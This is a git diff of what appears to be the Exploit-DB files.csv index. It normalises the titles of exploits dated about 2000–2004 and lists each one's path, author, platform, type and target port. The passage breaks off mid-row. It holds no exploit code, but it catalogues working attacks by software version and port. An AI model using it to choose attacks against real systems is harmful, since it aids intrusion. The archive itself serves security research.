diff --git a/files.csv b/files.csv index 51b246ff7..e23ab1001 100755 --- a/files.csv +++ b/files.csv @@ -13,28 +13,28 @@ id,file,description,date,author,platform,type,port 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Local Root Exploit",2003-04-14,KuRaK,linux,local,0 13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service Exploit",2003-04-18,"Luca Ercoli",windows,dos,0 15,platforms/osx/local/15.c,"Mac OS X <= 10.2.4 DirectoryService (PATH) Local Root Exploit",2003-04-18,"Neeko Oni",osx,local,0 -16,platforms/linux/remote/16.c,"PoPToP PPTP <= 1.1.4-b3 Remote Root Exploit",2003-04-18,einstein,linux,remote,1723 +16,platforms/linux/remote/16.c,"PoPToP PPTP <= 1.1.4-b3 - Remote Root Exploit",2003-04-18,einstein,linux,remote,1723 17,platforms/windows/dos/17.pl,"Xeneo Web Server 2.2.9.0 - Denial of Service Exploit",2003-04-22,"Tom Ferris",windows,dos,0 18,platforms/linux/remote/18.sh,"Snort <= 1.9.1 - Remote Root Exploit (p7snort191.sh)",2003-04-23,truff,linux,remote,0 -19,platforms/linux/remote/19.c,"PoPToP PPTP <= 1.1.4-b3 Remote Root Exploit (poptop-sane.c)",2003-04-25,blightninjas,linux,remote,1723 +19,platforms/linux/remote/19.c,"PoPToP PPTP <= 1.1.4-b3 - Remote Root Exploit (poptop-sane.c)",2003-04-25,blightninjas,linux,remote,1723 20,platforms/windows/remote/20.txt,"Microsoft Windows SMB - Authentication Remote Exploit",2003-04-25,"Haamed Gheibi",windows,remote,139 21,platforms/linux/local/21.c,"Qpopper 4.0.x - poppassd Local Root Exploit",2003-04-29,Xpl017Elz,linux,local,0 22,platforms/windows/dos/22.c,"Pi3Web 2.0.1 - Denial of Service - Proof of Concept",2003-04-29,aT4r,windows,dos,0 23,platforms/windows/remote/23.c,"Real Server < 8.0.2 - Remote Exploit (Windows Platforms)",2003-04-30,"Johnny Cyberpunk",windows,remote,554 24,platforms/linux/remote/24.c,"Sendmail <= 8.12.8 prescan() BSD Remote Root Exploit",2003-04-30,bysin,linux,remote,25 -25,platforms/linux/remote/25.c,"OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool",2003-04-30,"Maurizio Agazzini",linux,remote,0 -26,platforms/linux/remote/26.sh,"OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh)",2003-05-02,"Nicolas Couture",linux,remote,0 +25,platforms/linux/remote/25.c,"OpenSSH/PAM <= 3.6.1p1 - Remote Users Discovery Tool",2003-04-30,"Maurizio Agazzini",linux,remote,0 +26,platforms/linux/remote/26.sh,"OpenSSH/PAM <= 3.6.1p1 - Remote Users Ident (gossh.sh)",2003-05-02,"Nicolas Couture",linux,remote,0 27,platforms/linux/remote/27.pl,"CommuniGate Pro Webmail 4.0.6 Session Hijacking Exploit",2003-05-05,"Yaroslav Polyakov",linux,remote,80 28,platforms/windows/remote/28.c,"Kerio Personal Firewall 2.1.4 - Remote Code Execution Exploit",2003-05-08,Burebista,windows,remote,0 29,platforms/bsd/local/29.c,"Firebird 1.0.2 FreeBSD 4.7-RELEASE Local Root Exploit",2003-05-12,bob,bsd,local,0 -30,platforms/windows/remote/30.pl,"Snitz Forums 3.3.03 Remote Command Execution Exploit",2003-05-12,N/A,windows,remote,0 -31,platforms/linux/local/31.pl,"CdRecord Version <= 2.0 - Mandrake local root exploit",2003-05-14,N/A,linux,local,0 -32,platforms/windows/local/32.c,"Microsoft Windows XP (explorer.exe) - Buffer Overflow Exploit",2003-05-21,einstein,windows,local,0 -33,platforms/linux/remote/33.c,"WsMp3d 0.x Remote Root Heap Overflow Exploit",2003-05-22,Xpl017Elz,linux,remote,8000 +30,platforms/windows/remote/30.pl,"Snitz Forums 3.3.03 - Remote Command Execution Exploit",2003-05-12,N/A,windows,remote,0 +31,platforms/linux/local/31.pl,"CdRecord <= 2.0 - Mandrake local root Exploit",2003-05-14,N/A,linux,local,0 +32,platforms/windows/local/32.c,"Microsoft Windows XP (explorer.exe) - Buffer Overflow Exploit",2003-05-21,einstein,windows,local,0 +33,platforms/linux/remote/33.c,"WsMp3d 0.x - Remote Root Heap Overflow Exploit",2003-05-22,Xpl017Elz,linux,remote,8000 34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 (Apache) Remote Exploit",2003-05-29,N/A,linux,remote,80 35,platforms/windows/dos/35.c,"Microsoft Windows IIS 5.0 - 5.1 - Remote Denial of Service Exploit",2003-05-31,Shachank,windows,dos,0 36,platforms/windows/remote/36.c,"Microsoft Windows WebDav II - Remote Root Exploit (new)",2003-06-01,alumni,windows,remote,80 -37,platforms/windows/remote/37.pl,"MS Internet Explorer Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0 +37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0 38,platforms/linux/remote/38.pl,"Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl",2003-06-08,"Matthew Murphy",linux,remote,80 39,platforms/linux/remote/39.c,"Atftpd 0.6 - Remote Root Exploit (atftpdx.c)",2003-06-10,gunzip,linux,remote,69 40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 - /usr/mail Local Exploit (d86mail.pl)",2003-06-10,N/A,linux,local,0 @@ -49,13 +49,13 @@ id,file,description,date,author,platform,type,port 49,platforms/linux/remote/49.c,"Linux eXtremail 1.5.x - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25 50,platforms/windows/remote/50.pl,"ColdFusion MX Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80 51,platforms/windows/remote/51.c,"Microsoft Windows WebDav III - Remote Root Exploit (xwdav)",2003-07-08,Schizoprenic,windows,remote,80 -52,platforms/windows/local/52.asm,"ICQ Pro 2003a Password Bypass exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0 +52,platforms/windows/local/52.asm,"ICQ Pro 2003a Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0 53,platforms/cgi/webapps/53.c,"CCBILL CGI Remote Exploit for whereami.cgi (ccbillx.c)",2003-07-10,knight420,cgi,webapps,0 -54,platforms/windows/remote/54.c,"LeapFTP 2.7.x Remote Buffer Overflow Exploit",2003-07-12,drG4njubas,windows,remote,21 +54,platforms/windows/remote/54.c,"LeapFTP 2.7.x - Remote Buffer Overflow Exploit",2003-07-12,drG4njubas,windows,remote,21 55,platforms/linux/remote/55.c,"Samba 2.2.8 (Bruteforce Method) Remote Root Exploit",2003-07-13,Schizoprenic,linux,remote,139 56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - (nsiislog.dll) Remote Exploit",2003-07-14,N/A,windows,remote,80 57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 (TTYPROMPT in.telnet) Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0 -58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504 +58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504 59,platforms/hardware/dos/59.c,"Cisco IOS IPv4 Packets Denial of Service Exploit",2003-07-18,l0cK,hardware,dos,0 60,platforms/hardware/dos/60.c,"Cisco IOS IPv4 Packet Denial of Service Exploit (cisco-bug-44020.c)",2003-07-21,"Martin Kluge",hardware,dos,0 61,platforms/windows/dos/61.c,"Microsoft Windows 2000 - RPC DCOM Interface DoS Exploit",2003-07-21,Flashsky,windows,dos,0 @@ -68,9 +68,9 @@ id,file,description,date,author,platform,type,port 68,platforms/linux/dos/68.c,"Linux Kernel <= 2.4.20 - decode_fh Denial of Service Exploit",2003-07-29,"Jared Stanbrough",linux,dos,0 69,platforms/windows/remote/69.c,"Microsoft Windows RPC DCOM Remote Exploit (18 Targets)",2003-07-29,pHrail,windows,remote,135 70,platforms/windows/remote/70.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (48 Targets)",2003-07-30,N/A,windows,remote,135 -71,platforms/linux/local/71.c,"XGalaga 2.0.34 local game exploit (Red Hat 9.0)",2003-07-31,c0wboy,linux,local,0 +71,platforms/linux/local/71.c,"XGalaga 2.0.34 local game Exploit (Red Hat 9.0)",2003-07-31,c0wboy,linux,local,0 72,platforms/linux/local/72.c,"xtokkaetama 1.0b Local Game Exploit (Red Hat 9.0)",2003-08-01,brahma,linux,local,0 -73,platforms/windows/dos/73.c,"Trillian 0.74 Remote Denial of Service Exploit",2003-08-01,l0bstah,windows,dos,0 +73,platforms/windows/dos/73.c,"Trillian 0.74 - Remote Denial of Service Exploit",2003-08-01,l0bstah,windows,dos,0 74,platforms/linux/remote/74.c,"wu-ftpd 2.6.2 off-by-one Remote Root Exploit",2003-08-03,Xpl017Elz,linux,remote,21 75,platforms/linux/local/75.c,"man-db 2.4.1 open_cat_stream() Local uid=man Exploit",2003-08-06,vade79,linux,local,0 76,platforms/windows/remote/76.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (Universal Targets)",2003-08-07,oc192,windows,remote,135 @@ -79,8 +79,8 @@ id,file,description,date,author,platform,type,port 79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server SYSTEM Exploit",2003-08-13,ash,windows,local,0 80,platforms/windows/remote/80.c,"Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit",2003-08-13,"David Litchfield",windows,remote,2100 81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking PoC Exploit",2003-08-15,"ste jones",windows,remote,0 -82,platforms/windows/dos/82.c,"Piolet Client 1.05 Remote Denial of Service Exploit",2003-08-20,"Luca Ercoli",windows,dos,0 -83,platforms/windows/remote/83.html,"MS Internet Explorer Object Data Remote Exploit (M03-032)",2003-08-21,malware,windows,remote,0 +82,platforms/windows/dos/82.c,"Piolet Client 1.05 - Remote Denial of Service Exploit",2003-08-20,"Luca Ercoli",windows,dos,0 +83,platforms/windows/remote/83.html,"Microsoft Internet Explorer Object Data Remote Exploit (M03-032)",2003-08-21,malware,windows,remote,0 84,platforms/linux/remote/84.c,"Gopherd <= 3.0.5 FTP Gateway Remote Overflow Exploit",2003-08-22,vade79,linux,remote,70 86,platforms/multiple/remote/86.c,"Real Server 7/8/9 - Remote Root Exploit (Windows & Linux)",2003-08-25,"Johnny Cyberpunk",multiple,remote,554 88,platforms/linux/remote/88.c,"GtkFtpd 1.0.4 - Remote Root Buffer Overflow Exploit",2003-08-28,vade79,linux,remote,21 @@ -93,32 +93,32 @@ id,file,description,date,author,platform,type,port 95,platforms/multiple/remote/95.c,"Roger Wilco 1.x Client Data Buffer Overflow Exploit",2003-09-10,"Luigi Auriemma",multiple,remote,0 96,platforms/osx/remote/96.c,"4D WebSTAR FTP Server Suite Remote Buffer Overflow Exploit",2003-09-11,B-r00t,osx,remote,21 97,platforms/windows/remote/97.c,"Microsoft Windows - (RPC DCOM) Scanner (MS03-039)",2003-09-12,"Doke Scott",windows,remote,135 -98,platforms/linux/remote/98.c,"MySQL 3.23.x/4.0.x Remote Exploit",2003-09-14,bkbll,linux,remote,3306 -99,platforms/linux/remote/99.c,"Pine <= 4.56 Remote Buffer Overflow Exploit",2003-09-16,sorbo,linux,remote,0 +98,platforms/linux/remote/98.c,"MySQL 3.23.x/4.0.x - Remote Exploit",2003-09-14,bkbll,linux,remote,3306 +99,platforms/linux/remote/99.c,"Pine <= 4.56 - Remote Buffer Overflow Exploit",2003-09-16,sorbo,linux,remote,0 100,platforms/windows/remote/100.c,"Microsoft Windows - (RPC DCOM) Long Filename Overflow Exploit (MS03-026)",2003-09-16,ey4s,windows,remote,135 101,platforms/solaris/remote/101.pl,"Solaris Sadmind Default Configuration Remote Root Exploit",2003-09-19,"H D Moore",solaris,remote,111 102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 Backup Remote Root Exploit",2003-09-20,N/A,linux,remote,617 103,platforms/windows/remote/103.c,"Microsoft Windows - (RPC DCOM2) Remote Exploit (MS03-039)",2003-09-20,Flashsky,windows,remote,135 -104,platforms/linux/local/104.c,"hztty 2.0 - Local root exploit (Tested on Red Hat 9.0)",2003-09-21,c0wboy,linux,local,0 +104,platforms/linux/local/104.c,"hztty 2.0 - Local root Exploit (Tested on Red Hat 9.0)",2003-09-21,c0wboy,linux,local,0 105,platforms/bsd/remote/105.pl,"GNU Cfengine 2.-2.0.3 - Remote Stack Overflow Exploit",2003-09-27,kokanin,bsd,remote,5308 106,platforms/linux/local/106.c,"IBM DB2 Universal Database 7.2 (db2licm) Local Exploit",2003-09-27,"Juan Escriba",linux,local,0 107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21 109,platforms/windows/remote/109.c,"Microsoft Windows - (RPC2) Universal Exploit & DoS (RPC3) (MS03-039)",2003-10-09,N/A,windows,remote,135 -110,platforms/linux/remote/110.c,"ProFTPD 1.2.7 - 1.2.9rc2 Remote Root & brute-force Exploit",2003-10-13,Haggis,linux,remote,21 +110,platforms/linux/remote/110.c,"ProFTPD 1.2.7 - 1.2.9rc2 - Remote Root & brute-force Exploit",2003-10-13,Haggis,linux,remote,21 111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service Denial of Service Exploit (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0 112,platforms/windows/remote/112.c,"mIRC 6.1 ""IRC"" Protocol Remote Buffer Overflow Exploit",2003-10-21,blasty,windows,remote,0 -113,platforms/windows/dos/113.pl,"MS Exchange 2000 XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0 -114,platforms/solaris/local/114.c,"Solaris Runtime Linker (ld.so.1) Buffer Overflow Exploit (SPARC version)",2003-10-27,osker178,solaris,local,0 +113,platforms/windows/dos/113.pl,"Microsoft Exchange 2000 XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0 +114,platforms/solaris/local/114.c,"Solaris Runtime Linker (ld.so.1) - Buffer Overflow Exploit (SPARC version)",2003-10-27,osker178,solaris,local,0 115,platforms/linux/dos/115.c,"wu-ftpd 2.6.2 - Remote Denial of Service Exploit (wuftpd-freezer.c)",2003-10-31,"Angelo Rosiello",linux,dos,0 116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server <= 4.10 Remote Exploit",2003-11-04,xCrZx,windows,remote,515 117,platforms/windows/remote/117.c,"Microsoft Windows 2000/XP - RPC Remote (non exec memory) Exploit",2003-11-07,ins1der,windows,remote,135 118,platforms/bsd/local/118.c,"OpenBSD (ibcs2_exec) Kernel Local Exploit",2003-11-07,"Scott Bartram",bsd,local,0 119,platforms/windows/remote/119.c,"Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0 -120,platforms/linux/local/120.c,"TerminatorX <= 3.81 stack overflow local root exploit",2003-11-13,Li0n7,linux,local,0 -121,platforms/windows/remote/121.c,"MS Frontpage Server Extensions fp30reg.dll Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80 +120,platforms/linux/local/120.c,"TerminatorX <= 3.81 Stack Overflow local root Exploit",2003-11-13,Li0n7,linux,local,0 +121,platforms/windows/remote/121.c,"Microsoft Frontpage Server Extensions fp30reg.dll Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80 122,platforms/windows/local/122.c,"Microsoft Windows - (ListBox/ComboBox Control) Local Exploit (MS03-045)",2003-11-14,xCrZx,windows,local,0 123,platforms/windows/remote/123.c,"Microsoft Windows Workstation Service WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0 -124,platforms/windows/remote/124.pl,"IA WebMail 3.x - (iaregdll.dll version 1.0.0.5) Remote Exploit",2003-11-19,"Peter Winter-Smith",windows,remote,80 +124,platforms/windows/remote/124.pl,"IA WebMail 3.x - (iaregdll.dll 1.0.0.5) Remote Exploit",2003-11-19,"Peter Winter-Smith",windows,remote,80 125,platforms/bsd/local/125.c,"OpenBSD 2.x - 3.3 exec_ibcs2_coff_prep_zmagic() Kernel Exploit",2003-11-19,"Sinan Eren",bsd,local,0 126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit",2003-11-20,xCrZx,linux,remote,80 127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (Webserver)",2003-11-22,nesumin,windows,remote,0 @@ -131,7 +131,7 @@ id,file,description,date,author,platform,type,port 135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135 136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80 137,platforms/php/webapps/137.pl,"phpBB 2.0.6 search_id SQL Injection MD5 Hash Remote Exploit",2003-12-21,RusH,php,webapps,0 -138,platforms/php/webapps/138.pl,"PHP-NUKE version <= 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0 +138,platforms/php/webapps/138.pl,"PHP-NUKE <= 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0 139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - abook_dbname Remote Root Exploit",2003-12-27,SpikE,linux,remote,406 140,platforms/linux/local/140.c,"Xsok 1.02 - ""-xsokdir"" Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0 141,platforms/linux/local/141.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - ""do_mremap"" Local Proof of Concept",2004-01-06,"Christophe Devine",linux,local,0 @@ -140,18 +140,18 @@ id,file,description,date,author,platform,type,port 144,platforms/linux/local/144.c,"SuSE linux 9.0 - YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0 145,platforms/linux/local/145.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - mremap() Bound Checking Root Exploit",2004-01-15,"Paul Starzetz",linux,local,0 146,platforms/multiple/dos/146.c,"OpenSSL ASN.1<= 0.9.6j <= 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0 -147,platforms/windows/dos/147.c,"Need for Speed 2 Remote Client Buffer Overflow Exploit",2004-01-23,"Luigi Auriemma",windows,dos,0 +147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow Exploit",2004-01-23,"Luigi Auriemma",windows,dos,0 148,platforms/windows/dos/148.sh,"Microsoft Windows 2003/XP - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0 149,platforms/windows/remote/149.c,"Serv-U FTPD 3.x/4.x ""SITE CHMOD"" Command Remote Exploit",2004-01-27,lion,windows,remote,21 -151,platforms/windows/remote/151.txt,"MS Internet Explorer URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0 -152,platforms/linux/local/152.c,"rsync <= 2.5.7 - Local stack overflow Root Exploit",2004-02-13,"Abhisek Datta",linux,local,0 +151,platforms/windows/remote/151.txt,"Microsoft Internet Explorer URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0 +152,platforms/linux/local/152.c,"rsync <= 2.5.7 - Local Stack Overflow Root Exploit",2004-02-13,"Abhisek Datta",linux,local,0 153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0 154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - ""mremap()"" Local Proof-of-Concept (2)",2004-02-18,"Christophe Devine",linux,local,0 155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128 -156,platforms/windows/remote/156.c,"PSOProxy 0.91 Remote Buffer Overflow Exploit (Win2k/XP)",2004-02-26,Rave,windows,remote,8080 +156,platforms/windows/remote/156.c,"PSOProxy 0.91 - Remote Buffer Overflow Exploit (Win2k/XP)",2004-02-26,Rave,windows,remote,8080 157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389 158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x (MDTM) Remote Overflow Exploit",2004-02-27,Sam,windows,remote,21 -159,platforms/windows/remote/159.c,"WFTPD Server <= 3.21 Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21 +159,platforms/windows/remote/159.c,"WFTPD Server <= 3.21 - Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21 160,platforms/linux/local/160.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - ""mremap()"" Missing ""do_munmap"" Exploit",2004-03-01,"Paul Starzetz",linux,local,0 161,platforms/windows/dos/161.c,"Red Faction <= 1.20 Server Reply Remote Buffer Overflow Exploit",2004-03-04,"Luigi Auriemma",windows,dos,0 163,platforms/windows/remote/163.pl,"Eudora 6.0.3 Attachment Spoofing Exploit (windows)",2004-03-19,N/A,windows,remote,0 @@ -168,22 +168,22 @@ id,file,description,date,author,platform,type,port 174,platforms/linux/remote/174.c,"Monit <= 4.2 - Remote Root Buffer Overflow Exploit",2004-04-12,"Abhisek Datta",linux,remote,2812 175,platforms/windows/remote/175.pl,"eMule <= 0.42d IRC Remote Buffer Overflow Exploit",2004-04-12,kingcope,windows,remote,0 176,platforms/windows/dos/176.c,"Microsoft Windows IIS - SSL Remote Denial of Service Exploit (MS04-011)",2004-04-14,"David Barroso",windows,dos,0 -177,platforms/cgi/webapps/177.pl,"Poll It CGI 2.0 - exploit",2000-11-15,keelis,cgi,webapps,0 +177,platforms/cgi/webapps/177.pl,"Poll It CGI 2.0 - Exploit",2000-11-15,keelis,cgi,webapps,0 178,platforms/linux/local/178.c,"traceroute Local Root Exploit",2000-11-15,"Michel Kaempf",linux,local,0 179,platforms/cgi/webapps/179.c,"News Update 1.1 Change Admin Password",2000-11-15,morpheus[bd],cgi,webapps,0 180,platforms/linux/local/180.c,"GnomeHack 1.0.5 - Local Buffer Overflow Exploit",2000-11-15,vade79,linux,local,0 181,platforms/linux/remote/181.c,"Half Life (rcon) Remote Buffer Overflow Exploit",2000-11-16,"Sao Paulo",linux,remote,27015 -182,platforms/linux/local/182.sh,"/sbin/restore exploit (rh6.2)",2000-11-16,N/A,linux,local,0 +182,platforms/linux/local/182.sh,"/sbin/restore Exploit (rh6.2)",2000-11-16,N/A,linux,local,0 183,platforms/linux/local/183.c,"Oracle (oidldapd connect) Local Command Line Overflow Exploit",2000-11-16,N/A,linux,local,0 184,platforms/linux/local/184.pl,"Restore and Dump Local Exploit",2000-11-16,Tlabs,linux,local,0 185,platforms/linux/dos/185.sh,"Slackware Linux - /usr/bin/ppp-off Insecure /tmp Call Exploit",2000-11-17,sinfony,linux,dos,0 -186,platforms/linux/local/186.pl,"xsplumber - strcpy() buffer overflow",2000-11-17,vade79,linux,local,0 +186,platforms/linux/local/186.pl,"xsplumber - strcpy() Buffer overflow",2000-11-17,vade79,linux,local,0 187,platforms/cgi/webapps/187.pl,"ListMail 112 - Command Execution",2000-11-17,teleh0r,cgi,webapps,0 188,platforms/cgi/webapps/188.pl,"UtilMind Mail List 1.7 - Users Can Execute Commands",2000-11-17,teleh0r,cgi,webapps,0 -189,platforms/windows/remote/189.c,"MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (6)",2000-11-18,incubus,windows,remote,80 -190,platforms/windows/remote/190.c,"MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (9)",2000-11-18,Optyx,windows,remote,80 -191,platforms/windows/remote/191.pl,"MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (7)",2000-11-18,steeLe,windows,remote,80 -192,platforms/windows/remote/192.pl,"MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (8)",2000-11-18,"Roelof Temmingh",windows,remote,80 +189,platforms/windows/remote/189.c,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (6)",2000-11-18,incubus,windows,remote,80 +190,platforms/windows/remote/190.c,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (9)",2000-11-18,Optyx,windows,remote,80 +191,platforms/windows/remote/191.pl,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (7)",2000-11-18,steeLe,windows,remote,80 +192,platforms/windows/remote/192.pl,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (8)",2000-11-18,"Roelof Temmingh",windows,remote,80 193,platforms/linux/local/193.sh,"dump 0.4b15 Local Root Exploit",2000-11-19,mat,linux,local,0 195,platforms/hp-ux/dos/195.sh,"HP-UX 11.00/10.20 crontab Overwrite Files Exploit",2000-11-19,dubhe,hp-ux,dos,0 197,platforms/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 locale Format String Exploit",2000-11-20,"Solar Eclipse",solaris,local,0 @@ -194,7 +194,7 @@ id,file,description,date,author,platform,type,port 203,platforms/linux/local/203.sh,"vixie-cron Local Root Exploit",2000-11-21,"Michal Zalewski",linux,local,0 204,platforms/linux/remote/204.c,"BFTPd vsprintf() Format Strings Exploit",2000-11-29,DiGiT,linux,remote,21 205,platforms/linux/local/205.pl,"rpc Suid Privledge Exploit",2000-11-29,Tlabs,linux,local,0 -206,platforms/linux/local/206.c,"dump 0.4b15 exploit (Redhat 6.2)",2000-11-29,mat,linux,local,0 +206,platforms/linux/local/206.c,"dump 0.4b15 Exploit (Redhat 6.2)",2000-11-29,mat,linux,local,0 207,platforms/bsd/local/207.c,"BSDi 3.0 inc Local Root Buffer Overflow Exploit",2000-11-30,vade79,bsd,local,0 208,platforms/linux/remote/208.c,"INND/NNRP < 1.6.x - Remote Root Overflow Exploit",2000-11-30,"Babcia Padlina",linux,remote,119 209,platforms/linux/local/209.c,"GLIBC (via /bin/su) Local Root Exploit",2000-11-30,localcore,linux,local,0 @@ -203,20 +203,20 @@ id,file,description,date,author,platform,type,port 212,platforms/hp-ux/dos/212.c,"HP-UX FTPD Remote Buffer Overflow Exploit",2000-12-01,venglin,hp-ux,dos,0 213,platforms/solaris/remote/213.c,"Solaris sadmind Remote Buffer Overflow Exploit",2000-12-01,Optyx,solaris,remote,111 214,platforms/windows/dos/214.c,"Microsoft Windows - (Jolt2.c) Denial of Service Exploit",2000-12-02,phonix,windows,dos,0 -215,platforms/linux/local/215.c,"mount exploit for glibc locale bug",2000-12-02,sk8,linux,local,0 +215,platforms/linux/local/215.c,"mount Exploit for glibc locale bug",2000-12-02,sk8,linux,local,0 216,platforms/linux/local/216.c,"dislocate 1.3 - Local i386 Exploit",2000-12-02,"Michel Kaempf",linux,local,0 217,platforms/linux/local/217.c,"UUCP Exploit - file creation/overwriting (symlinks)",2000-12-04,t--zen,linux,local,0 -218,platforms/linux/local/218.c,"expect (/usr/bin/expect) buffer overflow",2000-12-04,isox,linux,local,0 +218,platforms/linux/local/218.c,"expect (/usr/bin/expect) Buffer overflow",2000-12-04,isox,linux,local,0 219,platforms/linux/local/219.c,"GnomeHack Local Buffer Overflow Exploit (gid=games)",2000-12-04,"Cody Tubbs",linux,local,0 220,platforms/linux/remote/220.c,"PHP 3.0.16/4.0.2 - Remote Format Overflow Exploit",2000-12-06,Gneisenau,linux,remote,80 221,platforms/linux/local/221.c,"Kwintv Local Buffer Overflow Exploit (gid=video(33))",2000-12-06,"Cody Tubbs",linux,local,0 -222,platforms/linux/local/222.c,"gnome_segv local buffer overflow",2000-12-06,"Cody Tubbs",linux,local,0 -225,platforms/linux/remote/225.c,"BFTPd 1.0.12 Remote Exploit",2000-12-11,korty,linux,remote,21 -226,platforms/linux/remote/226.c,"LPRng 3.6.22/23/24 Remote Root Exploit",2000-12-11,sk8,linux,remote,515 +222,platforms/linux/local/222.c,"gnome_segv local Buffer overflow",2000-12-06,"Cody Tubbs",linux,local,0 +225,platforms/linux/remote/225.c,"BFTPd 1.0.12 - Remote Exploit",2000-12-11,korty,linux,remote,21 +226,platforms/linux/remote/226.c,"LPRng 3.6.22/23/24 - Remote Root Exploit",2000-12-11,sk8,linux,remote,515 227,platforms/linux/remote/227.c,"LPRng (RedHat 7.0) lpd Remote Root Format String Exploit",2000-12-11,DiGiT,linux,remote,515 228,platforms/bsd/remote/228.c,"Oops! 1.4.6 (one russi4n proxy-server) Heap Buffer Overflow Exploit",2000-12-15,diman,bsd,remote,3128 229,platforms/linux/local/229.c,"Linux xsoldier-0.96 Exploit (Red Hat 6.2)",2000-12-15,zorgon,linux,local,0 -230,platforms/linux/remote/230.c,"LPRng 3.6.24-1 Remote Root Exploit",2000-12-15,VeNoMouS,linux,remote,515 +230,platforms/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Root Exploit",2000-12-15,VeNoMouS,linux,remote,515 231,platforms/linux/local/231.sh,"Pine (Local Message Grabber) Exploit",2000-12-15,mat,linux,local,0 232,platforms/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 Blocked Port Bypass Exploit",2000-12-19,Unknown,windows,remote,0 233,platforms/windows/dos/233.pl,"Solaris 2.7 / 2.8 Catman - Local Insecure tmp Symlink Exploit",2000-12-19,"Shane Hird",windows,dos,0 @@ -227,13 +227,13 @@ id,file,description,date,author,platform,type,port 238,platforms/linux/dos/238.c,"ml2 - local users can crash processes",2001-01-03,Stealth,linux,dos,0 239,platforms/solaris/remote/239.c,"wu-ftpd 2.6.0 - Remote 